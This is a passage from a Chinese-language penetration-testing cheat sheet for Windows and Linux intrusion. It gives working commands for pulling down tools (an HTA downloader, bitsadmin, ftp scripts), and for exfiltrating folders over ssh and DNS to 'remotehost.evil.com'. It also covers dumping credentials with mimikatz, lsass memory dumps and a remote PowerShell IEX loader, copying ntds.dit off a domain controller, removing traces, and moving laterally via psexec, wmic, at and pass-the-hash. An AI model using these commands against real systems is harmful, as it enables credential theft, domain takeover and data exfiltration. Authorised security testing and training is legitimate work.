</code></pre><p>3、bitsadmin<br>win03测试没有,win08有</p><pre><code data-origin="<pre><code>bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip
</code></pre>">bitsadmin /transfer n http://lemon.com/file.zip c:\1.zip
</code></pre><p>4、文件共享<br>映射了一个，结果没有权限写</p><pre><code data-origin="<pre><code>net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword
</code></pre>">net use x: \\127.0.0.1\share /user:centoso.com\userID myPassword
</code></pre><p>5、使用telnet接收数据</p><pre><code data-origin="<pre><code>服务端：nc -lvp 23 &amp;lt; nc.exe
下载端：telnet ip -f c:\nc.exe
</code></pre>">服务端：nc -lvp 23 &lt; nc.exe
下载端：telnet ip -f c:\nc.exe
</code></pre><p>6、hta<br>保存为.hta文件后运行</p><pre><code class="html" data-origin="<pre><code class=&quot;html&quot;>&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;script&amp;gt;
var Object = new ActiveXObject(&quot;MSXML2.XMLHTTP&quot;);
Object.open(&quot;GET&quot;,&quot;http://192.168.206.101/demo.php.zip&quot;,false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject(&quot;ADODB.Stream&quot;);
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile(&quot;C:\\demo.zip&quot;, 2);
    Stream.Close();
}
window.close();
&amp;lt;/script&amp;gt;
&amp;lt;HTA:APPLICATION ID=&quot;test&quot;
WINDOWSTATE = &quot;minimize&quot;&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
</code></pre>">&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.206.101/demo.php.zip",false);
Object.send();
if (Object.Status == 200)
{
    var Stream = new ActiveXObject("ADODB.Stream");
    Stream.Open();
    Stream.Type = 1;
    Stream.Write(Object.ResponseBody);
    Stream.SaveToFile("C:\\demo.zip", 2);
    Stream.Close();
}
window.close();
&lt;/script&gt;
&lt;HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize"&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre><h5 id="linux下文件传输"><a name="linux下文件传输" href="#linux下文件传输"></a>linux下文件传输</h5><p>1、perl脚本文件下载<br>kali下测试成功，centos5.5下，由于没有LWP::Simple这个，导致下载失败</p><pre class="perl hljs"><code class="perl" data-origin="<pre><code class=&quot;perl&quot;>#!/usr/bin/perl
use LWP::Simple
getstore(&quot;http://lemon.com/file.zip&quot;, &quot;/root/1.zip&quot;);
</code></pre>"><span class="hljs-comment">#!/usr/bin/perl</span>
<span class="hljs-keyword">use</span> LWP::Simple
getstore(<span class="hljs-string">"http://lemon.com/file.zip"</span>, <span class="hljs-string">"/root/1.zip"</span>);
</code></pre><p>2、python文件下载</p><pre><code data-origin="<pre><code>#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://lemon.com/file.zip')
localFile = open('/root/1.zip', 'w')
localFile.write(u.read())
localFile.close()
</code></pre>">#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://lemon.com/file.zip')
localFile = open('/root/1.zip', 'w')
localFile.write(u.read())
localFile.close()
</code></pre><p>3、ruby文件下载<br>centos5.5没有ruby环境</p><pre><code data-origin="<pre><code>#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start(&quot;www.lemon.com&quot;) { |http|
r = http.get(&quot;/file.zip&quot;)
open(&quot;/root/1.zip&quot;, &quot;wb&quot;) { |file|
file.write(r.body)
}
}
</code></pre>">#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.lemon.com") { |http|
r = http.get("/file.zip")
open("/root/1.zip", "wb") { |file|
file.write(r.body)
}
}
</code></pre><p>4、wget文件下载</p><pre><code data-origin="<pre><code>wget http://lemon.com/file.zip -P /root/1.zip
其中-P是保存到指定目录
</code></pre>">wget http://lemon.com/file.zip -P /root/1.zip
其中-P是保存到指定目录
</code></pre><p>5、一边tar一边ssh上传</p><pre><code data-origin="<pre><code>tar zcf - /some/localfolder | ssh remotehost.evil.com &quot;cd /some/path/name;tar zxpf -&quot;
</code></pre>">tar zcf - /some/localfolder | ssh remotehost.evil.com "cd /some/path/name;tar zxpf -"
</code></pre><p>6、利用dns传输数据</p><pre><code data-origin="<pre><code>tar zcf - localfolder | xxd -p -c 16 |  while read line; do host $line.domain.com remotehost.evil.com; done
</code></pre>">tar zcf - localfolder | xxd -p -c 16 |  while read line; do host $line.domain.com remotehost.evil.com; done
</code></pre><p>但是有时候会因为没找到而导致数据重复,对数据分析有点影响<br><img src="pic/4/6.jpg" alt=""></p><h5 id="其他传输方式"><a name="其他传输方式" href="#其他传输方式"></a>其他传输方式</h5><p>1、php脚本文件下载</p><pre><code data-origin="<pre><code>&amp;lt;?php
        $data = @file(&quot;http://example.com/file&quot;);
        $lf = &quot;local_file&quot;;
        $fh = fopen($lf, 'w');
        fwrite($fh, $data[0]);
        fclose($fh);
?&amp;gt;
</code></pre>">&lt;?php
        $data = @file("http://example.com/file");
        $lf = "local_file";
        $fh = fopen($lf, 'w');
        fwrite($fh, $data[0]);
        fclose($fh);
?&gt;
</code></pre><p>2、ftp文件下载</p><pre><code data-origin="<pre><code>&amp;gt;**windows下**
&amp;gt;ftp下载是需要交互，但是也可以这样去执行下载
open host
username
password
bin
lcd c:/
get file
bye
&amp;gt;将这个内容保存为1.txt， ftp -s:&quot;c:\1.txt&quot;
&amp;gt;在mssql命令执行里面(不知道为什么单行执行一个echo,总是显示两行),个人一般喜欢这样
echo open host &amp;gt;&amp;gt; c:\hh.txt &amp;amp; echo username &amp;gt;&amp;gt; c:\hh.txt &amp;amp; echo password &amp;gt;&amp;gt;c:\hh.txt &amp;amp; echo bin &amp;gt;&amp;gt;c:\hh.txt &amp;amp; echo lcd c:\&amp;gt;&amp;gt;c:\hh.txt &amp;amp; echo get nc.exe  &amp;gt;&amp;gt;c:\hh.txt &amp;amp; echo bye &amp;gt;&amp;gt;c:\hh.txt &amp;amp; ftp -s:&quot;c:\hh.txt&quot; &amp;amp; del c:\hh.txt

&amp;gt;**linux下**

&amp;gt;bash文件
ftp 127.0.0.1
username
password
get file
exit

&amp;gt;或者使用busybox里面的tftp或者ftp
&amp;gt;busybox ftpget -u test -P test 127.0.0.1 file.zip
</code></pre>">&gt;**windows下**
&gt;ftp下载是需要交互，但是也可以这样去执行下载
open host
username
password
bin
lcd c:/
get file
bye
&gt;将这个内容保存为1.txt， ftp -s:"c:\1.txt"
&gt;在mssql命令执行里面(不知道为什么单行执行一个echo,总是显示两行),个人一般喜欢这样
echo open host &gt;&gt; c:\hh.txt &amp; echo username &gt;&gt; c:\hh.txt &amp; echo password &gt;&gt;c:\hh.txt &amp; echo bin &gt;&gt;c:\hh.txt &amp; echo lcd c:\&gt;&gt;c:\hh.txt &amp; echo get nc.exe  &gt;&gt;c:\hh.txt &amp; echo bye &gt;&gt;c:\hh.txt &amp; ftp -s:"c:\hh.txt" &amp; del c:\hh.txt

&gt;**linux下**

&gt;bash文件
ftp 127.0.0.1
username
password
get file
exit

&gt;或者使用busybox里面的tftp或者ftp
&gt;busybox ftpget -u test -P test 127.0.0.1 file.zip
</code></pre><p>3、nc文件传输</p><pre><code data-origin="<pre><code>服务端:cat file | nc -l 1234
下载端:nc host_ip 1234 &amp;gt; file
</code></pre>">服务端:cat file | nc -l 1234
下载端:nc host_ip 1234 &gt; file
</code></pre><p>4、使用SMB传送文件<br>本地linux的smb环境配置</p><pre><code data-origin="<pre><code>&amp;gt;vi /etc/samba/smb.conf
[test]
    comment = File Server Share
    path = /tmp/
    browseable = yes
    writable = yes
    guest ok = yes
    read only = no
    create mask = 0755
&amp;gt;service samba start
</code></pre>">&gt;vi /etc/samba/smb.conf
[test]
    comment = File Server Share
    path = /tmp/
    browseable = yes
    writable = yes
    guest ok = yes
    read only = no
    create mask = 0755
&gt;service samba start
</code></pre><p>下载端</p><pre><code data-origin="<pre><code>net use o: \\192.168.206.129\test
dir o:
</code></pre>">net use o: \\192.168.206.129\test
dir o:
</code></pre><p><img src="pic/4/5.jpg" alt=""></p><h5 id="文件编译"><a name="文件编译" href="#文件编译"></a>文件编译</h5><p>1、powershell将exe转为txt，再txt转为exe<br>nishang中的小脚本，测试一下将nc.exe转化为nc.txt再转化为nc1.exe<br>ExetoText.ps1</p><pre><code data-origin="<pre><code>[byte[]] $hexdump = get-content -encoding byte -path &quot;nc.exe&quot;
[System.IO.File]::WriteAllLines(&quot;nc.txt&quot;, ([string]$hexdump))
</code></pre>">[byte[]] $hexdump = get-content -encoding byte -path "nc.exe"
[System.IO.File]::WriteAllLines("nc.txt", ([string]$hexdump))
</code></pre><p>TexttoExe.ps1</p><pre><code data-origin="<pre><code>[String]$hexdump = get-content -path &quot;nc.txt&quot;
[Byte[]] $temp = $hexdump -split ' '
[System.IO.File]::WriteAllBytes(&quot;nc1.exe&quot;, $temp)
</code></pre>">[String]$hexdump = get-content -path "nc.txt"
[Byte[]] $temp = $hexdump -split ' '
[System.IO.File]::WriteAllBytes("nc1.exe", $temp)
</code></pre><p><img src="pic/4/3.jpg" alt=""></p><p>2、csc.exe编译源码<br>csc.exe在C:\Windows\Microsoft.NET\Framework\的各种版本之下</p><pre><code data-origin="<pre><code>csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs
</code></pre>">csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs
</code></pre><p><img src="pic/4/4.jpg" alt=""></p><p>3、debug程序<br>hex功能能将hex文件转换为exe文件(win08_x64没有这个,win03_x32有,听说是x32才有这个)</p><p><img src="pic/4/7.png" alt=""></p><p>思路：</p><ol>
<li>把需要上传的exe转换成十六进制hex的形式</li><li>通过echo命令将hex代码写入文件(echo也是有长度限制的)</li><li>使用debug功能将hex代码还原出exe文件</li></ol><p><img src="pic/4/8.jpg" alt=""><br>将ncc.txt的内容一条一条的在cmd下面执行，最后可以获取到123.hex、1.dll、nc.exe<br>exe2bat不支持大于64kb的文件</p><hr class="page"><h3 id="hash抓取"><a name="hash抓取" href="#hash抓取"></a>hash抓取</h3><h5 id="hash简介"><a name="hash简介" href="#hash简介"></a>hash简介</h5><p>windows hash:</p><table>
<thead>
<tr>
<th></th>
<th>2000</th>
<th>xp</th>
<th>2003</th>
<th>Vista</th>
<th>win7</th>
<th>2008</th>
<th>2012</th>
</tr>
</thead>
<tbody>
<tr>
<td>LM</td>
<td>√</td>
<td>√</td>
<td>√</td>
</tr>
<tr>
<td>NTLM</td>
<td>√</td>
<td>√</td>
<td>√</td>
<td>√</td>
<td>√</td>
<td>√</td>
<td>√</td>
</tr>
</tbody>
</table><p>前面三个,当密码超过14位时候会采用NTLM加密<br>test:1003:E52CAC67419A9A22664345140A852F61:67A54E1C9058FCA16498061B96863248:::<br>前一部分是LM Hash，后一部分是NTLM Hash<br>当LM Hash是<strong>AAD3B435B51404EEAAD3B435B51404EE</strong><br>这表示<strong>空密码或者是未使用LM_HASH</strong></p><p>Hash一般存储在两个地方：<br>SAM文件，存储在本机                         对应本地用户<br>NTDS.DIT文件，存储在域控上              对应域用户</p><h5 id="本机hash+明文抓取"><a name="本机hash+明文抓取" href="#本机hash+明文抓取"></a>本机hash+明文抓取</h5><p>1、Get-PassHashes.ps1<br><img src="pic/5/3.jpg" alt=""></p><p>2、导注册表+本地分析<br>Win2000和XP需要先提到SYSTEM，03开始直接可以reg save<br>导出的文件大,效率低,但是安全(测试的时候和QuarkPwDump抓取的hash不一致)</p><pre><code data-origin="<pre><code>reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
</code></pre>">reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
</code></pre><p><img src="pic/5/4.jpg" alt=""></p><p>3、QuarkPwDump</p><pre><code data-origin="<pre><code>QuarkPwDump.exe -dhl -o &quot;c:\1.txt&quot;
</code></pre>">QuarkPwDump.exe -dhl -o "c:\1.txt"
</code></pre><p><img src="pic/5/5.jpg" alt=""></p><p>4、getpass本地账户明文抓取<br>闪电小子根据mimikatz写的一个内存获取明文密码</p><p><img src="pic/5/6.jpg" alt=""></p><p><a href="http://bbs.pediy.com/showthread.php?t=156643">http://bbs.pediy.com/showthread.php?t=156643</a></p><h5 id="win8+win2012明文抓取"><a name="win8+win2012明文抓取" href="#win8+win2012明文抓取"></a>win8+win2012明文抓取</h5><p>修改一个注册表就可以抓取了</p><pre><code data-origin="<pre><code>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
</code></pre>">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
</code></pre><p>测试失败<br>工具：<a href="https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1">https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1</a><br>文章地址：<a href="https://www.trustedsec.com/april-2015/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/">https://www.trustedsec.com/april-2015/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/</a></p><hr class="page"><p>域用户hash抓取</p><h5 id="mimikatz"><a name="mimikatz" href="#mimikatz"></a>mimikatz</h5><p>只能抓取登陆过的用户hash，无法抓取所有用户,需要免杀<br>1、本机测试直接获取内存中的明文密码</p><pre><code data-origin="<pre><code>privilege::debug
sekurlsa::logonpasswords
</code></pre>">privilege::debug
sekurlsa::logonpasswords
</code></pre><p><img src="pic/5/1.jpg" alt=""></p><p>2、非交互式抓明文密码(webshell中)</p><pre><code data-origin="<pre><code>mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; &amp;gt; pssword.txt
</code></pre>">mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" &gt; pssword.txt
</code></pre><p>3、powershell加载mimikatz抓取密码</p><pre><code data-origin="<pre><code>powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
</code></pre>">powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
</code></pre><p>4、ProcDump + Mimikatz本地分析<br>文件会比较大，低效，但是安全(绕过杀软)<br>ps:mimikatz的平台（platform）要与进行dump的系统(source dump)兼容(比如dowm了08的,本地就要用08系统来分析)</p><pre><code data-origin="<pre><code>远程：
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
本地：
sekurlsa::minidump lsass.dump.dmp
sekurlsa::logonpasswords full
</code></pre>">远程：
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
本地：
sekurlsa::minidump lsass.dump.dmp
sekurlsa::logonpasswords full
</code></pre><p><img src="pic/5/2.jpg" alt=""></p><h5 id="ntds.dit的导出+quarkpwdump读取分析"><a name="ntds.dit的导出+quarkpwdump读取分析" href="#ntds.dit的导出+quarkpwdump读取分析"></a>ntds.dit的导出+QuarkPwDump读取分析</h5><p>无法抓取所有用户,需要免杀</p><p>这个方法分为两步：<br>第一步是利用工具导出ntds.dit<br>第二步是利用QuarkPwDump去分析hash</p><p>1、ntds.dit的导出</p><ol>
<li><p>ntdsutil    win2008开始DC中自带的工具</p>
<blockquote>
<p>a.交互式</p>
<pre><code data-origin="<pre><code>snapshot
activate instance ntds
create
mount xxx
</code></pre>">snapshot
activate instance ntds
create
mount xxx
</code></pre><p><img src="pic/5/7.jpg" alt=""></p>
<p>做完后unmount然后需要再delet一下</p>
<p><img src="pic/5/8.jpg" alt=""></p>
<p>b.非交互</p>
<pre><code data-origin="<pre><code>ntdsutil snapshot &quot;activate instance ntds&quot; create quit quit
ntdsutil snapshot &quot;mount {GUID}&quot; quit quit
copy MOUNT_POINT\windows\ntds\ntds.dit c:\temp\ntds.dit
ntdsutil snapshot &quot;unmount {GUID}&quot; &quot;delete {GUID}&quot; quit quit
</code></pre>">ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy MOUNT_POINT\windows\ntds\ntds.dit c:\temp\ntds.dit
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit
</code></pre><p><img src="pic/5/9.jpg" alt=""></p>
</blockquote>
</li><li><p>vshadow   微软的卷影拷贝工具</p>
<blockquote>
<pre><code data-origin="<pre><code>vshadow.exe -exec=%ComSpec% C:
</code></pre>">vshadow.exe -exec=%ComSpec% C:
</code></pre><p>其中%ComSpec%是cmd的绝对路径,它在建立卷影后会启动一个程序,只有这个程序才能卷影进行操作,其他不能,比如这里就是用cmd.exe来的<br>最后exit一下</p>
<p><img src="pic/5/10.jpg" alt=""></p>
</blockquote>
</li></ol><p>2、QuarkPwDump分析<br><a href="https://github.com/quarkslab/quarkspwdump">https://github.com/quarkslab/quarkspwdump</a></p><ol>
<li><p>在线提取</p>
<pre><code data-origin="<pre><code>QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit
</code></pre>">QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit
</code></pre></li><li><p>离线提取<br>需要两个文件 ntds.dit 和 system.hiv<br>其中system.hiv可通过<code>reg save hklm\system system.hiv</code>获取</p>
<pre><code data-origin="<pre><code>QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hiv
</code></pre>">QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hiv
</code></pre><p><img src="pic/5/11.jpg" alt=""></p>
</li></ol><p>3、实战中hash导出流程</p><blockquote>
<p>1.建立ipc$连接<br><code>net use \\DC1\c$ password /user:username</code><br>2.复制文件到DC<br><code>copy .\* \\DC1\windows\tasks</code><br>3.sc建立远程服务启动程序<br><code>sc \\DC1 create backupntds binPath= "cmd /c start c:\windows\tasks\shadowcopy.bat" type= share start= auto error= ignore DisplayName= BackupNTDS</code><br>4.启动服务<br><code>sc \\DC1 start backupntds</code><br>5.删除服务<br><code>sc \\DC1 delete backupntds</code><br>6.讲hash转移到本地<br><code>move \\DC1\c$\windows\tasks\hash.txt .</code><br>7.删除记录文件<br><code>del \\DC1\c$\windows\tasks\ntds.dit \\DC1\c$\windows\tasks\QuarksPwDump.exe \\DC1\c$\windows\tasks\shadowcopy.bat \\DC1\c$\windows\tasks\vshadow.exe</code></p>
</blockquote><p><img src="pic/5/12.jpg" alt=""></p><p>注意的两点是：<br>a.WORK_PATH和你拷贝的地方要相同<br><img src="pic/5/13.jpg" alt=""></p><p>b.附件中的QuarkPwDump在win08上面运行报错,另外修改版可以,所以实战前还是要测试一下</p><h5 id="vssown.vbs-+-libesedb-+-ntdsxtract"><a name="vssown.vbs-+-libesedb-+-ntdsxtract" href="#vssown.vbs-+-libesedb-+-ntdsxtract"></a>vssown.vbs + libesedb + NtdsXtract</h5><p>上面的QuarkPwDump是在win上面分析ntds.dit,这个是linux上面的离线分析<br>优点是能获取全部的用户,不用免杀,但是数据特别大,效率低,另外用vssown.vbs复制出来的ntds.dit数据库无法使用QuarksPwDump.exe读取</p><p>hash导出：<br><a href="https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs">https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs</a></p><p>最后需要copy出system和ntds.dit两个文件</p><pre><code data-origin="<pre><code>c:\windows\system32\config\system
c:\windows\ntds\ntds.dit
</code></pre>">c:\windows\system32\config\system
c:\windows\ntds\ntds.dit
</code></pre><p><img src="pic/5/14.jpg" alt=""><br><img src="pic/5/15.jpg" alt=""><br>记得一定要delete快照！！！</p><pre><code data-origin="<pre><code>cscript vssown.vbs /delete *
</code></pre>">cscript vssown.vbs /delete *
</code></pre><p>本地环境搭建+分析：</p><pre><code data-origin="<pre><code>libesedb的搭建:
wget https://github.com/libyal/libesedb/releases/download/20151213/libesedb-experimental-20151213.tar.gz
tar zxvf libesedb-experimental-20151213.tar.gz
cd libesedb-20151213/
./configure
make
cd esedbtools/
(需要把刚刚vbs脱下来的ntds.dit放到kali)
./esedbexport ./ntds.dit
mv ntds.dit.export/ ../../

ntdsxtract工具的安装:
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
unzip ntdsxtract_v1_0.zip
cd NTDSXtract 1.0/
(需要把刚刚vbs脱下来的SYSTEM放到/root/SYSTEM)
python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes '/root/SYSTEM'
</code></pre>">libesedb的搭建:
wget https://github.com/libyal/libesedb/releases/download/20151213/libesedb-experimental-20151213.tar.gz
tar zxvf libesedb-experimental-20151213.tar.gz
cd libesedb-20151213/
./configure
make
cd esedbtools/
(需要把刚刚vbs脱下来的ntds.dit放到kali)
./esedbexport ./ntds.dit
mv ntds.dit.export/ ../../

ntdsxtract工具的安装:
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
unzip ntdsxtract_v1_0.zip
cd NTDSXtract 1.0/
(需要把刚刚vbs脱下来的SYSTEM放到/root/SYSTEM)
python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes '/root/SYSTEM'
</code></pre><p><img src="pic/5/16.jpg" alt=""></p><h5 id="ntdsdump"><a name="ntdsdump" href="#ntdsdump"></a>ntdsdump</h5><p>laterain的推荐：<a href="http://z-cg.com/post/ntds_dit_pwd_dumper.html">http://z-cg.com/post/ntds_dit_pwd_dumper.html</a><br>是zcgonvh大牛根据quarkspwdump修改的，=。=，没找到和QuarkPwDump那个修改版的区别<br>获取ntds.dit和system.hiv之后(不用利用那个vbs导出,好像并不能分析出来)<br><img src="pic/5/17.jpg" alt=""></p><h5 id="利用powershell(dsinternals)分析hash"><a name="利用powershell(dsinternals)分析hash" href="#利用powershell(dsinternals)分析hash"></a>利用powershell(DSInternals)分析hash</h5><p>查看powershell版本：</p><pre><code data-origin="<pre><code>$PSVersionTable.PSVersion
看第一个Major
或者
Get-Host | Select-Object Version
</code></pre>">$PSVersionTable.PSVersion
看第一个Major
或者
Get-Host | Select-Object Version
</code></pre><p>Windows Server 2008 R2默认环境下PowerShell版本2.0，应该升级到3.0版本以上,需要.NET Framework 4.0</p><p>需要文件：</p><pre><code data-origin="<pre><code>ntds.dit(vshadow获取)
system(reg获取)
</code></pre>">ntds.dit(vshadow获取)
system(reg获取)
</code></pre><p>执行命令：</p><pre><code data-origin="<pre><code>允许执行脚本：
Set-ExecutionPolicy Unrestricted

导入模块(测试是win2012_powershell ver4.0)：
Import-Module .\DSInternals
(powershell ver5.0)
Install-Module DSInternals

分析hash,并导出到当前目录的hash.txt文件中
1、$key = Get-BootKey -SystemHivePath 'C:\Users\administrator\Desktop\SYSTEM'
2、Get-ADDBAccount -All -DBPath 'C:\Users\administrator\Desktop\ntds.dit' -BootKey $key | Out-File hash.txt
</code></pre>">允许执行脚本：
Set-ExecutionPolicy Unrestricted

导入模块(测试是win2012_powershell ver4.0)：
Import-Module .\DSInternals
(powershell ver5.0)
Install-Module DSInternals

分析hash,并导出到当前目录的hash.txt文件中
1、$key = Get-BootKey -SystemHivePath 'C:\Users\administrator\Desktop\SYSTEM'
2、Get-ADDBAccount -All -DBPath 'C:\Users\administrator\Desktop\ntds.dit' -BootKey $key | Out-File hash.txt
</code></pre><p><img src="pic/5/18.jpg" alt=""></p><p>这个只是离线分析了ntds.dit文件,其实也可以在线操作,=。=,不过感觉实战中遇到的会比较少,毕竟现在主流是win08为域控(以后这个倒不失为一个好方法)<br>更多详情参考三好学生大牛的文章：<a href="http://drops.wooyun.org/tips/10181">http://drops.wooyun.org/tips/10181</a></p><hr class="page"><h3 id="远程连接&amp;&amp;执行程序"><a name="远程连接&amp;&amp;执行程序" href="#远程连接&amp;&amp;执行程序"></a>远程连接&amp;&amp;执行程序</h3><h5 id="at&amp;schtasks"><a name="at&amp;schtasks" href="#at&amp;schtasks"></a>at&amp;schtasks</h5><p>需要开启Task Scheduler服务<br>经典流程：</p><pre><code data-origin="<pre><code>1、进行一个连接
net use \\10.10.24.44\ipc$ 密码 /user:账号

2、复制本地文件到10.10.24.44的share共享目录(一般是放入admin$这个共享地方(也就是c:\winnt\system32\)，或者c$，d$)
copy 4.bat \\10.10.24.44\share

3、查看10.10.24.44服务器的时间
net time \\10.10.24.44

4、添加at任务执行
at \\10.10.24.44 6:21 \\10.10.24.44\share\4.bat
这个6:21指的是上午的时间，如果想添加下午的，则是6.21PM

5、查看添加的所有at任务列表(如果执行了得，就不会显示)
at \\10.10.24.44
</code></pre>">1、进行一个连接
net use \\10.10.24.44\ipc$ 密码 /user:账号

2、复制本地文件到10.10.24.44的share共享目录(一般是放入admin$这个共享地方(也就是c:\winnt\system32\)，或者c$，d$)
copy 4.bat \\10.10.24.44\share

3、查看10.10.24.44服务器的时间
net time \\10.10.24.44

4、添加at任务执行
at \\10.10.24.44 6:21 \\10.10.24.44\share\4.bat
这个6:21指的是上午的时间，如果想添加下午的，则是6.21PM

5、查看添加的所有at任务列表(如果执行了得，就不会显示)
at \\10.10.24.44
</code></pre><p>其他命令：</p><pre><code data-origin="<pre><code>查看所有连接
net use
删除连接
net use \\10.10.24.44\share /del

映射共享磁盘到本地
net use z: \\IP\c$ &quot;密码&quot; /user:&quot;用户名&quot;
删除共享映射
net use c: /del
net use * /del
</code></pre>">查看所有连接
net use
删除连接
net use \\10.10.24.44\share /del

映射共享磁盘到本地
net use z: \\IP\c$ "密码" /user:"用户名"
删除共享映射
net use c: /del
net use * /del
</code></pre><p><strong>at过去后如果找不到网络路径,则判断是目标主机已禁用Task Scheduler服务</strong></p><h5 id="psexec"><a name="psexec" href="#psexec"></a>psexec</h5><p>第一次运行会弹框,输入–accepteula这个参数就可以绕过</p><pre><code data-origin="<pre><code>psexec.exe \\ip –accepteula -u username -p password program.exe
</code></pre>">psexec.exe \\ip –accepteula -u username -p password program.exe
</code></pre><p><img src="pic/6/1.jpg" alt=""></p><p>另外两个比较重要的参数</p><pre><code data-origin="<pre><code>-c &amp;lt;[路径]文件名&amp;gt;:拷贝文件到远程机器并运行（注意：运行结束后文件会自动删除）
-d 不等待程序执行完就返回
比如想上传一个本地的getpass到你远程连接的服务器上去:
Psexec.exe \\ip –u user –p pass –c c:\getpass.exe –d
</code></pre>">-c &lt;[路径]文件名&gt;:拷贝文件到远程机器并运行（注意：运行结束后文件会自动删除）
-d 不等待程序执行完就返回
比如想上传一个本地的getpass到你远程连接的服务器上去:
Psexec.exe \\ip –u user –p pass –c c:\getpass.exe –d
</code></pre><p>另外学习一波pstools的一些运用：<br><a href="http://blog.csdn.net/sysprogram/article/details/13001781">http://blog.csdn.net/sysprogram/article/details/13001781</a></p><p><strong>如果出现找不到网络名，判断目标主机已禁用ADMIN$共享</strong></p><h5 id="wmic"><a name="wmic" href="#wmic"></a>wmic</h5><p>net use后：</p><pre><code data-origin="<pre><code>copy 1.bat \\host\c$\windows\temp\1.bat

wmic /node:ip /user:test /password:testtest process call create c:\windows\temp\1.bat
</code></pre>">copy 1.bat \\host\c$\windows\temp\1.bat

wmic /node:ip /user:test /password:testtest process call create c:\windows\temp\1.bat
</code></pre><p><img src="pic/6/2.jpg" alt=""></p><p>ps:<br>如果出现User credentials cannot be used for local connections,应该是调用了calc.exe权限不够的问题<br>如果出现Description = 无法启动服务，原因可能是已被禁用或与其相关联的设备没有启动，判断WMI服务被禁用</p><h5 id="wmiexec.vbs"><a name="wmiexec.vbs" href="#wmiexec.vbs"></a>wmiexec.vbs</h5><pre><code data-origin="<pre><code>1、半交互模式
cscript.exe //nologo wmiexec.vbs /shell ip username password
2、单命令执行
cscript.exe wmiexec.vbs /cmd ip username password &quot;command&quot;
3、wce_hash注入
如果抓取的LM hash是AAD3开头的，或者是No Password之类的，就用32个0代替LM hash
wce -s hash
cscript.exe //nologo wmiexec.vbs /shell ip
</code></pre>">1、半交互模式
cscript.exe //nologo wmiexec.vbs /shell ip username password
2、单命令执行
cscript.exe wmiexec.vbs /cmd ip username password "command"
3、wce_hash注入
如果抓取的LM hash是AAD3开头的，或者是No Password之类的，就用32个0代替LM hash
wce -s hash
cscript.exe //nologo wmiexec.vbs /shell ip
</code></pre><p><img src="pic/6/3.jpg" alt=""><br>wmi只是创建进程,没办法去判断一个进程是否执行完成(比如ping),这样就导致wmi.dll删除不成,下一次又是被占用,这时候修改一下vbs里面的名字就好：<code>Const FileName = "wmi1.dll"</code>,也可以加入<code>-persist</code>参数(后台运行)</p><p>另外有一个uac问题<br><strong>非域用户</strong>登陆到win08和2012中,只有administrator可以登陆成功,其他管理员账号会出现WMIEXEC ERROR: Access is denied<br>需要在win08或者2012上面执行,然后才可以连接:</p><pre><code data-origin="<pre><code>cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
</code></pre>">cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
